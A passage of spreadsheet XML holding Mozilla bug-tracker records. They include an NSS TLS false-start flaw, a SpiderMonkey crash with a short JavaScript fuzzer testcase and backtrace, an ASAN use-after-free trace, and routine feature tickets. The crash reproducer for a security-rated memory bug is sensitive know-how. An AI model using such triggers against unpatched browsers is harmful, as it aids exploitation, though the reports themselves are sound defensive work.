get rid of it). Finally, search engines should be stored in user profile, not in
the browser root, so they persist if the browser is upgraded.
Reproducible: Always
Steps to Reproduce:</t>
        </is>
      </c>
      <c r="X4630" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4631">
      <c r="A4631" t="n">
        <v>919877</v>
      </c>
      <c r="B4631" t="inlineStr">
        <is>
          <t>2013-09-23 22:38:44 -0700</t>
        </is>
      </c>
      <c r="C4631" t="inlineStr">
        <is>
          <t>When false start is enabled, libssl will sometimes return unencrypted, unauthenticated data from PR_Recv</t>
        </is>
      </c>
      <c r="D4631" t="inlineStr">
        <is>
          <t>2014-01-12 16:07:30 -0800</t>
        </is>
      </c>
      <c r="E4631" t="n">
        <v>1</v>
      </c>
      <c r="F4631" t="n">
        <v>1</v>
      </c>
      <c r="G4631" t="n">
        <v>3</v>
      </c>
      <c r="H4631" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4631" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J4631" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K4631" t="inlineStr">
        <is>
          <t>trunk</t>
        </is>
      </c>
      <c r="L4631" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4631" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4631" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4631" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4631" t="inlineStr">
        <is>
          <t>[fixed with the patch to bug 713933]</t>
        </is>
      </c>
      <c r="Q4631" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4631" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4631" t="inlineStr">
        <is>
          <t>3.15.4</t>
        </is>
      </c>
      <c r="T4631" t="n">
        <v>1</v>
      </c>
      <c r="U4631" t="n">
        <v>0</v>
      </c>
      <c r="V4631" t="n">
        <v>18</v>
      </c>
      <c r="W4631" t="inlineStr">
        <is>
          <t>While working on updating strsclnt to actually test false start [1] as part of bug 713933, I added a SSL_TRC call to ssl_SecureSend that would be triggered whenever we are sending data when !ss-&gt;isFirstHsDone. However, when running strsclnt, that condition was never true, even when we were false starting. That is because of this code:
&gt; @@ -103,20 +103,22 @@ ssl_Do1stHandshake(sslSocket *ss)
&gt;  
&gt;  	    SSL_TRC(3, ("%d: SSL[%d]: handshake is completed",
&gt;  			SSL_GETPID(), ss-&gt;fd));
&gt;              /* call handshake callback for ssl v2 */
&gt;  	    /* for v3 this is done in ssl3_HandleFinished() */
&gt;  	    if ((ss-&gt;handshakeCallback != NULL) &amp;&amp; /* has callback */
&gt;  		(!ss-&gt;firstHsDone) &amp;&amp;              /* only first time */
&gt;  		(ss-&gt;version &lt; SSL_LIBRARY_VERSION_3_0)) {  /* not ssl3 */
&gt; -		ss-&gt;firstHsDone     = PR_TRUE;
&gt; +		ss-&gt;firstHsDone = PR_TRUE;
&gt; +		ss-&gt;enoughFirstHsDone = PR_TRUE;
&gt;  		(ss-&gt;handshakeCallback)(ss-&gt;fd, ss-&gt;handshakeCallbackData);
&gt;  	    }
&gt; -	    ss-&gt;firstHsDone         = PR_TRUE;
&gt; +	    ss-&gt;firstHsDone = PR_TRUE;
&gt; +	    ss-&gt;enoughFirstHsDone = PR_TRUE;
&gt;  	    ss-&gt;gs.writeOffset = 0;
&gt;  	    ss-&gt;gs.readOffset  = 0;
The problem isn't with the changes made by my patch, but with the existing code that sets ss-&gt;firstHsDone = PR_TRUE (the bottom instance).
To verify that this is actually problematic, I modified libssl so that, when ss-&gt;sec.isServer is true, it would skip sending change_cipher_spec, skip sending the finished message, and skip switching its write cipher spec to the encrypted/authenticated cipher spec. With these changes, selfserv will send its application_data records unencrypted and unauthenticated immediately after the ServerHelloDone.
Then, I stripped sslstress.txt down to only the new ECC false start cases I added. Finally, I added a breakpoint between the point where strsclnt sends its HTTP request and the point where it receives the HTTP response. In the debugger, I verified that the application data was received by strsclnt unencrypted and unauthenticated, and that libssl returned the unencrypted and unauthenticated data unmodified to strsclnt.
strsclnt seems to use blocking I/O. Firefox and Chromium use non-blocking I/O. I attempted to create a test case using non-blocking I/O to trigger this wrong behavior. However, so far I have not been able to. I am still investigating why. It appears there may some significant difference in the SSL handshake gathering logic in the blocking and non-blocking cases. It could be that the blocking I/O case is the only one that is problematic but I haven't verified that yet.
Again, it does not seem like the changes for bug 713933 caused this problem. However, now I am going to go back and do my experiment on a version of libssl without the patches in that bug.
[1] The existing strsclnt test script, sslstress.txt, only contains entries for false start that use RSA key exchange. However, the default libssl criteria for false start was changed after that those test cases were added, and now libssl won't (by default) allow false start for connections using RSA key exchange, so the tests haven't really testing false start for a while.</t>
        </is>
      </c>
      <c r="X4631" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4632">
      <c r="A4632" t="n">
        <v>1888892</v>
      </c>
      <c r="B4632" t="inlineStr">
        <is>
          <t>2024-04-01 01:43:49 -0700</t>
        </is>
      </c>
      <c r="C4632" t="inlineStr">
        <is>
          <t>Wild deref in js::CheckTracedThing&lt;js::Shape&gt;</t>
        </is>
      </c>
      <c r="D4632" t="inlineStr">
        <is>
          <t>2024-09-18 19:36:43 -0700</t>
        </is>
      </c>
      <c r="E4632" t="n">
        <v>1</v>
      </c>
      <c r="F4632" t="n">
        <v>1</v>
      </c>
      <c r="G4632" t="n">
        <v>3</v>
      </c>
      <c r="H4632" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4632" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4632" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K4632" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4632" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4632" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4632" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4632" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4632" t="inlineStr">
        <is>
          <t>[adv-main125+]</t>
        </is>
      </c>
      <c r="Q4632" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4632" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S4632" t="inlineStr">
        <is>
          <t>126 Branch</t>
        </is>
      </c>
      <c r="T4632" t="n">
        <v>1</v>
      </c>
      <c r="U4632" t="n">
        <v>0</v>
      </c>
      <c r="V4632" t="n">
        <v>19</v>
      </c>
      <c r="W4632" t="inlineStr">
        <is>
          <t>Steps to reproduce:
On git commit 28cc363411d2029aed04c969c8f98785cae110db the attached sample crashes the js-shell when invoked as `obj-x86_64-pc-linux-gnu/dist/bin/js --fuzzing-safe --gc-zeal=10 crash.js`
Bisecting the issue points to commit 0f80a6542954802e72888f3a2e43136a9a56eb65 related to bug 1863939.
```
function probe(value) {
    let originalPrototype, newPrototype;
    let handler = {
        get(target, key, receiver) {
            return Reflect.get(target, key, receiver);
        },
    };
    try {
        originalPrototype = Object.getPrototypeOf(value);
        newPrototype = new Proxy(originalPrototype, handler);
        Object.setPrototypeOf(value, newPrototype);
    } catch (e) {}
}
const v0 = [];
function f1() {
    Object.defineProperty(v0, 5, { configurable: true, get: f1 });
    try { v0.toReversed(); } catch (e) {}
    probe([].__proto__);
}
f1();
```
```
#0  js::CheckTracedThing&lt;js::Shape&gt; (trc=trc@entry=0x7fffffe35a10, thing=0x2726717dab80) at js/src/gc/Marking.cpp:136
#1  0x0000555557f2621c in js::gc::TraceEdgeInternal (trc=0x7fffffe35a10, thingp=0x7ffff54f90e8, Shape=0x555555a43546 "cacheir-weak-shape")
    at js/src/gc/Tracer.h:109
#2  js::TraceSameZoneCrossCompartmentEdge&lt;js::Shape*&gt; (trc=trc@entry=0x7fffffe35a10, dst=dst@entry=0x7ffff54f90e8, name=0x555555a43546 "cacheir-weak-shape")
    at js/src/gc/Marking.cpp:529
#3  0x0000555558534288 in js::jit::TraceCacheIRStub&lt;js::jit::ICCacheIRStub&gt; (trc=trc@entry=0x7fffffe35a10, stub=stub@entry=0x7ffff54f90a8, 
    stubInfo=0x7ffff55c6c00) at js/src/jit/CacheIRCompiler.cpp:1289
#4  0x00005555580c26d4 in js::jit::ICCacheIRStub::trace (this=0x7ffff54f90a8, trc=0x7fffffe35a10) at js/src/jit/BaselineIC.cpp:458
#5  0x00005555587a4968 in js::jit::TraceBaselineStubFrame (trc=0x7fffffe35a10, frame=...) at js/src/jit/JitFrames.cpp:1172
#6  js::jit::TraceJitActivation (trc=0x7fffffe35a10, activation=&lt;optimised out&gt;) at js/src/jit/JitFrames.cpp:1472
#7  js::jit::TraceJitActivations (cx=cx@entry=0x7ffff743ec00, trc=trc@entry=0x7fffffe35a10) at js/src/jit/JitFrames.cpp:1517
#8  0x0000555557f6f092 in js::gc::GCRuntime::traceRuntimeCommon (this=this@entry=0x7ffff742f798, trc=trc@entry=0x7fffffe35a10, 
    traceOrMark=traceOrMark@entry=js::gc::GCRuntime::TraceRuntime) at js/src/gc/RootMarking.cpp:303
#9  0x0000555557f61c66 in js::gc::GCRuntime::traceRuntimeForMinorGC (this=0x7ffff742f798, trc=0x7fffffe35a10, session=...)
    at js/src/gc/RootMarking.cpp:258
#10 js::Nursery::traceRoots (this=this@entry=0x7ffff7431860, session=..., mover=...) at js/src/gc/Nursery.cpp:1634
#11 0x0000555557f5ee2f in js::Nursery::doCollection (this=this@entry=0x7ffff7431860, session=..., options=options@entry=JS::GCOptions::Shrink, 
    reason=reason@entry=JS::GCReason::EVICT_NURSERY) at js/src/gc/Nursery.cpp:1494
#12 0x0000555557f5e302 in js::Nursery::collect (this=0x7ffff7431860, options=JS::GCOptions::Shrink, reason=JS::GCReason::EVICT_NURSERY)
    at js/src/gc/Nursery.cpp:1264
#13 0x0000555557ed5b7d in js::gc::GCRuntime::collectNursery (this=this@entry=0x7ffff742f798, options=JS::GCOptions::Shrink, 
    reason=reason@entry=JS::GCReason::EVICT_NURSERY, phase=phase@entry=js::gcstats::PhaseKind::EVICT_NURSERY_FOR_MAJOR_GC)
    at js/src/gc/GC.cpp:4750
#14 0x0000555557eceac2 in js::gc::GCRuntime::collectNurseryFromMajorGC (this=this@entry=0x7ffff742f798, reason=&lt;optimised out&gt;)
    at js/src/gc/GC.cpp:3893
#15 0x0000555557ece17c in js::gc::GCRuntime::endPreparePhase (this=this@entry=0x7ffff742f798, reason=reason@entry=JS::GCReason::DEBUG_GC)
    at js/src/gc/GC.cpp:2830
#16 0x0000555557ed4c25 in js::gc::GCRuntime::incrementalSlice (this=this@entry=0x7ffff742f798, budget=..., reason=reason@entry=JS::GCReason::DEBUG_GC, 
    budgetWasIncreased=false) at js/src/gc/GC.cpp:3733
#17 0x0000555557ed81fe in js::gc::GCRuntime::gcCycle (this=this@entry=0x7ffff742f798, nonincrementalByAPI=false, budgetArg=..., 
    reason=reason@entry=JS::GCReason::DEBUG_GC) at js/src/gc/GC.cpp:4322
#18 0x0000555557ed9b44 in js::gc::GCRuntime::collect (this=this@entry=0x7ffff742f798, nonincrementalByAPI=false, budget=..., 
    reason=reason@entry=JS::GCReason::DEBUG_GC) at js/src/gc/GC.cpp:4513
#19 0x0000555557ea60d7 in js::gc::GCRuntime::runDebugGC (this=this@entry=0x7ffff742f798) at js/src/gc/GC.cpp:4976
#20 0x0000555557eddba0 in js::gc::CellAllocator::PreAllocChecks&lt;(js::AllowGC)1&gt; (cx=0x7ffff743ec00, kind=&lt;optimised out&gt;)
    at js/src/gc/Allocator.cpp:257
#21 0x00005555572513b4 in js::gc::CellAllocator::AllocNurseryOrTenuredCell&lt;(JS::TraceKind)0, (js::AllowGC)1&gt; (cx=cx@entry=0x7ffff743ec00, 
    allocKind=js::gc::AllocKind::OBJECT2_BACKGROUND, thingSize=40, heap=js::gc::Heap::Default, site=site@entry=0x7ffff559b978)
    at js/src/gc/Allocator-inl.h:114
#22 0x0000555557251238 in js::gc::CellAllocator::NewObject&lt;js::NativeObject, (js::AllowGC)1&gt; (cx=cx@entry=0x7ffff743ec00, 
    kind=kind@entry=js::gc::AllocKind::OBJECT2_BACKGROUND, heap=heap@entry=js::gc::Heap::Default, clasp=clasp@entry=0x55555905cca0 &lt;js::PlainObject::class_&gt;, 
    site=site@entry=0x7ffff559b978) at js/src/gc/Allocator-inl.h:94
#23 0x000055555724fee5 in js::gc::CellAllocator::NewCell&lt;js::NativeObject, (js::AllowGC)1, js::gc::AllocKind&amp;, js::gc::Heap&amp;, JSClass const*&amp;, js::gc::AllocSite*&amp;&gt; (cx=0x7ffff743ec00, args=&lt;optimised out&gt;, args=&lt;optimised out&gt;, args=&lt;optimised out&gt;, args=&lt;optimised out&gt;)
    at js/src/gc/Allocator-inl.h:35
#24 JSContext::newCell&lt;js::NativeObject, (js::AllowGC)1, js::gc::AllocKind&amp;, js::gc::Heap&amp;, JSClass const*&amp;, js::gc::AllocSite*&amp;&gt; (this=0x7ffff743ec00, 
    args=&lt;optimised out&gt;, args=&lt;optimised out&gt;, args=&lt;optimised out&gt;, args=&lt;optimised out&gt;) at js/src/vm/JSContext-inl.h:359
#25 js::NativeObject::create (cx=0x7ffff743ec00, kind=js::gc::AllocKind::OBJECT2_BACKGROUND, heap=js::gc::Heap::Default, shape=..., site=0x7ffff559b978)
    at js/src/vm/NativeObject-inl.h:495
#26 0x000055555729ef8c in js::NativeObject::create&lt;js::PlainObject&gt; (cx=0x7ffff743ec00, kind=js::gc::AllocKind::OBJECT2_BACKGROUND, shape=...,
    site=0x7ffff559b978, heap=&lt;optimised out&gt;) at js/src/vm/NativeObject.h:762
#27 js::NewPlainObjectBaselineFallback (cx=0x7ffff743ec00, shape=..., allocKind=js::gc::AllocKind::OBJECT2_BACKGROUND, site=0x7ffff559b978)
    at js/src/vm/Interpreter.cpp:5101
#28 0x00002af92f171aee in ?? ()
#29 0x00000000000000cf in ?? ()
#30 0x00007fffffe36200 in ?? ()
```</t>
        </is>
      </c>
      <c r="X4632" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4633">
      <c r="A4633" t="n">
        <v>1626933</v>
      </c>
      <c r="B4633" t="inlineStr">
        <is>
          <t>2020-04-02 06:21:07 -0700</t>
        </is>
      </c>
      <c r="C4633" t="inlineStr">
        <is>
          <t>Support for bump_esr action in treescript</t>
        </is>
      </c>
      <c r="D4633" t="inlineStr">
        <is>
          <t>2020-04-03 14:42:50 -0700</t>
        </is>
      </c>
      <c r="E4633" t="n">
        <v>1</v>
      </c>
      <c r="F4633" t="n">
        <v>1</v>
      </c>
      <c r="G4633" t="n">
        <v>5</v>
      </c>
      <c r="H4633" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4633" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J4633" t="inlineStr">
        <is>
          <t>Release Automation: Other</t>
        </is>
      </c>
      <c r="K4633" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4633" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4633" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4633" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4633" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4633" t="inlineStr"/>
      <c r="Q4633" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R4633" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4633" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4633" t="n">
        <v>1</v>
      </c>
      <c r="U4633" t="n">
        <v>0</v>
      </c>
      <c r="V4633" t="n">
        <v>4</v>
      </c>
      <c r="W4633" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #1626027 +++
Support bump_esr action from old merge day script in treescript.</t>
        </is>
      </c>
      <c r="X4633" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4634">
      <c r="A4634" t="n">
        <v>1352120</v>
      </c>
      <c r="B4634" t="inlineStr">
        <is>
          <t>2017-03-30 09:58:33 -0700</t>
        </is>
      </c>
      <c r="C4634" t="inlineStr">
        <is>
          <t>Put a bookmark-star button in the location bar</t>
        </is>
      </c>
      <c r="D4634" t="inlineStr">
        <is>
          <t>2020-11-10 10:23:39 -0800</t>
        </is>
      </c>
      <c r="E4634" t="n">
        <v>1</v>
      </c>
      <c r="F4634" t="n">
        <v>1</v>
      </c>
      <c r="G4634" t="n">
        <v>2</v>
      </c>
      <c r="H4634" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4634" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4634" t="inlineStr">
        <is>
          <t>Theme</t>
        </is>
      </c>
      <c r="K4634" t="inlineStr">
        <is>
          <t>52 Branch</t>
        </is>
      </c>
      <c r="L4634" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4634" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4634" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4634" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4634" t="inlineStr">
        <is>
          <t>[photon-structure]</t>
        </is>
      </c>
      <c r="Q4634" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4634" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4634" t="inlineStr">
        <is>
          <t>Firefox 56</t>
        </is>
      </c>
      <c r="T4634" t="n">
        <v>1</v>
      </c>
      <c r="U4634" t="n">
        <v>1</v>
      </c>
      <c r="V4634" t="n">
        <v>30</v>
      </c>
      <c r="W4634" t="inlineStr">
        <is>
          <t>To complete the spec in bug 1352063, we will need to separate out the bookmark star from the bookmark menubutton and put the star in the location bar. This bug is to add the separate star button.</t>
        </is>
      </c>
      <c r="X4634" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4635">
      <c r="A4635" t="n">
        <v>882897</v>
      </c>
      <c r="B4635" t="inlineStr">
        <is>
          <t>2013-06-13 13:44:20 -0700</t>
        </is>
      </c>
      <c r="C4635" t="inlineStr">
        <is>
          <t>ASAN use-after-free in JS_GetGlobalForScopeChain</t>
        </is>
      </c>
      <c r="D4635" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E4635" t="n">
        <v>1</v>
      </c>
      <c r="F4635" t="n">
        <v>1</v>
      </c>
      <c r="G4635" t="n">
        <v>3</v>
      </c>
      <c r="H4635" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4635" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4635" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K4635" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4635" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4635" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4635" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4635" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4635" t="inlineStr">
        <is>
          <t>[asan] fixed in bug 887334</t>
        </is>
      </c>
      <c r="Q4635" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4635" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4635" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4635" t="n">
        <v>1</v>
      </c>
      <c r="U4635" t="n">
        <v>0</v>
      </c>
      <c r="V4635" t="n">
        <v>11</v>
      </c>
      <c r="W4635" t="inlineStr">
        <is>
          <t>Created attachment 762294
testcase (crashes firefox)
The attached testcase crashes Firefox Nightly with the following ASAN output. Needs domFuzzLite and might need several reloads, sometimes helps to open in multiple tabs at the same time.
==7138== ERROR: AddressSanitizer: heap-use-after-free on address 0x7f1337e70060 at pc 0x7f135a3fc2dd bp 0x7fff714b1cf0 sp 0x7fff714b1ce8
READ of size 8 at 0x7f1337e70060 thread T0
    #0 0x7f135a3fc2dc in JS_GetGlobalForScopeChain(JSContext*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jsapi.cpp:2267:0
    #1 0x7f13573d4e42 in xpc_UnmarkGrayContext(JSContext*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/xpconnect/src/xpcpublic.h:200:0
    #2 0x7f1357cd4dec in nsCxPusher::DoPush(JSContext*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/xpconnect/src/nsCxPusher.cpp:138:0
    #3 0x7f1357355794 in nsGlobalWindow::FreeInnerObjects() /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/dom/base/nsGlobalWindow.cpp:1462:0
    #4 0x7f135735f1dc in nsGlobalWindow::DetachFromDocShell() /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/dom/base/nsGlobalWindow.cpp:2733:0
    #5 0x7f1357d56bee in nsDocShell::Destroy() /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/docshell/base/nsDocShell.cpp:4960:0
    #6 0x7f1357d56f7f in non-virtual thunk to nsDocShell::Destroy() /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/docshell/base/nsDocShell.cpp:4993:0
    #7 0x7f1356c72f32 in nsFrameLoader::Finalize() /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/content/base/src/nsFrameLoader.cpp:574:0
    #8 0x7f1356c18aa9 in nsDocument::MaybeInitializeFinalizeFrameLoaders() /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/content/base/src/nsDocument.cpp:6267:0
    #9 0x7f1356c4ea49 in nsRunnableMethodImpl&lt;void (nsDocument::*)(), true&gt;::Run() /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/../../../dist/include/nsThreadUtils.h:350:0
    #10 0x7f1356baa62f in nsContentUtils::AddScriptRunner(nsIRunnable*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/content/base/src/nsContentUtils.cpp:4831:0
    #11 0x7f1356c262d2 in nsDocument::FinalizeFrameLoader(nsFrameLoader*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/content/base/src/nsDocument.cpp:6223:0
    #12 0x7f1356c7a245 in nsFrameLoader::Destroy() /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/content/base/src/nsFrameLoader.cpp:1365:0
    #13 0x7f135702d09d in nsGenericHTMLFrameElement::DestroyContent() /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/content/html/content/src/nsGenericHTMLFrameElement.cpp:274:0
    #14 0x7f1356b36562 in mozilla::dom::FragmentOrElement::DestroyContent() /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/content/base/src/FragmentOrElement.cpp:950:0
    #15 0x7f1356c2f0da in nsDocument::Destroy() /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/content/base/src/nsDocument.cpp:7736:0
    #16 0x7f13565ee5cc in nsDocumentViewer::Destroy() /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/layout/base/nsDocumentViewer.cpp:1618:0
    #17 0x7f13565f0de1 in nsDocumentViewer::Show() /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/layout/base/nsDocumentViewer.cpp:1921:0
    #18 0x7f135664009d in nsPresContext::EnsureVisible() /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/layout/base/nsPresContext.cpp:1856:0
    #19 0x7f135665c55b in PresShell::UnsuppressAndInvalidate() /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/layout/base/nsPresShell.cpp:3562:0
    #20 0x7f13565ea4fa in nsDocumentViewer::LoadComplete(tag_nsresult) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/layout/base/nsDocumentViewer.cpp:1065:0
    #21 0x7f1357d62ed4 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, tag_nsresult) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/docshell/base/nsDocShell.cpp:6657:0
    #22 0x7f1357d60a0b in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, tag_nsresult) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/docshell/base/nsDocShell.cpp:6454:0
    #23 0x7f1357d60e5f in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, tag_nsresult) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/docshell/base/nsDocShell.cpp:6461:0
    #24 0x7f1357d9bf95 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&amp;, tag_nsresult) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/uriloader/base/nsDocLoader.cpp:1323:0
    #25 0x7f1357d9b69b in nsDocLoader::doStopDocumentLoad(nsIRequest*, tag_nsresult) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/uriloader/base/nsDocLoader.cpp:865:0
    #26 0x7f1357d99a12 in nsDocLoader::DocLoaderIsEmpty(bool) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/uriloader/base/nsDocLoader.cpp:755:0
    #27 0x7f1357d9aeab in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, tag_nsresult) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/uriloader/base/nsDocLoader.cpp:639:0
    #28 0x7f1357d9b3dc in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, tag_nsresult) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/uriloader/base/nsDocLoader.cpp:643:0
    #29 0x7f1355f0985e in nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, tag_nsresult) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/netwerk/base/src/nsLoadGroup.cpp:684:0
    #30 0x7f1356c30544 in nsDocument::DoUnblockOnload() /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/content/base/src/nsDocument.cpp:7953:0
    #31 0x7f1356c302c1 in nsDocument::UnblockOnload(bool) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/content/base/src/nsDocument.cpp:7881:0
    #32 0x7f1356c19c18 in nsDocument::DispatchContentLoadedEvents() /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/content/base/src/nsDocument.cpp:4625:0
    #33 0x7f1356c4ea49 in nsRunnableMethodImpl&lt;void (nsDocument::*)(), true&gt;::Run() /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/../../../dist/include/nsThreadUtils.h:350:0
    #34 0x7f1358fdc28b in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/xpcom/threads/nsThread.cpp:626:0
    #35 0x7f1358f28931 in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/obj-firefox/xpcom/build/nsThreadUtils.cpp:238:0
    #36 0x7f13584d805b in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/ipc/glue/MessagePump.cpp:82:0
    #37 0x7f1359089051 in MessageLoop::RunInternal() /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/ipc/chromium/src/base/message_loop.cc:219:0
    #38 0x7f1359088f4e in MessageLoop::Run() /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/ipc/chromium/src/base/message_loop.cc:186:0
    #39 0x7f135832b851 in nsBaseAppShell::Run() /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/widget/xpwidgets/nsBaseAppShell.cpp:163:0
    #40 0x7f1357ed067f in nsAppStartup::Run() /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/toolkit/components/startup/nsAppStartup.cpp:269:0
    #41 0x7f1355ca9a39 in XREMain::XRE_mainRun() /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/toolkit/xre/nsAppRunner.cpp:3851:0
    #42 0x7f1355caad77 in XREMain::XRE_main(int, char**, nsXREAppData const*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/toolkit/xre/nsAppRunner.cpp:3919:0
    #43 0x7f1355cab701 in XRE_main /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/toolkit/xre/nsAppRunner.cpp:4121:0
    #44 0x40c7e6 in do_main(int, char**, nsIFile*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/browser/app/nsBrowserApp.cpp:272:0
    #45 0x40bd0f in main /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/browser/app/nsBrowserApp.cpp:632:0
    #46 0x7f1362ac4ea4 in ?? ??:0
0x7f1337e70060 is located 32 bytes inside of 1112-byte region [0x7f1337e70040,0x7f1337e70498)
freed by thread T0 here:
    #0 0x43b0e0 in __interceptor_free ??:?
    #1 0x7f135a4fe08e in SweepCompartments(js::FreeOp*, JS::Zone*, bool, bool) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jsgc.cpp:2524:0
